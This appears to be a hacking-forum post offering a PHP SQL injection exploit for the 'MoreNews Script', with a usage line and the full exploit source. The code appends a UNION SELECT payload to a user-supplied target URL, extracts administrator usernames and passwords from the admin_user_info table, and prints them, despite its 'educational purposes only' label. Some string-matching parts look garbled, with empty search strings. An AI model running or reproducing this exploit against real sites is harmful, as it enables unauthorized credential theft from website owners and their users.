SQL Injection Exploit [PHP] Hello HC, I made an SQL Injection exploit in PHP (for educational purposes only). This is an example of how a remote exploit works. Vulnerability was belong to "MoreNews Script" but It's patched now so use it for just educational purposes. Usage: Code: SELECT ALL http://localhost/script.php?web=http://targetsite.com/page.php?param= Sauce: PHP Code: SELECT ALL HackCommunity SQL Injection Exploit";if(!empty($_GET['web'])){print "Scanning the vulnerability...
________________________________
";$injquery = "null%20UNION%20SELECT%20concat_ws(0x3c68633e%2Cusername%2C0x3a%2C0x3a%2Cuserpass​​%2C0x3c2f68633e)%20from%20admin_user_info";$source = file_get_contents($_GET['web'] . $injquery);if(strstr($source, "")){$info = substr($source, strrpos($source, ''), strpos($source, '') - strrpos($source, ''));print "Vulnerability Exploit Successfull!

Result => $info";}else{print "Vulnerability Not Avaible For This Website..
";}}else{print "Please Enter an URL (ex: http://site.com/page.php?parameter= Wink
";}?> Image: Au Revoir..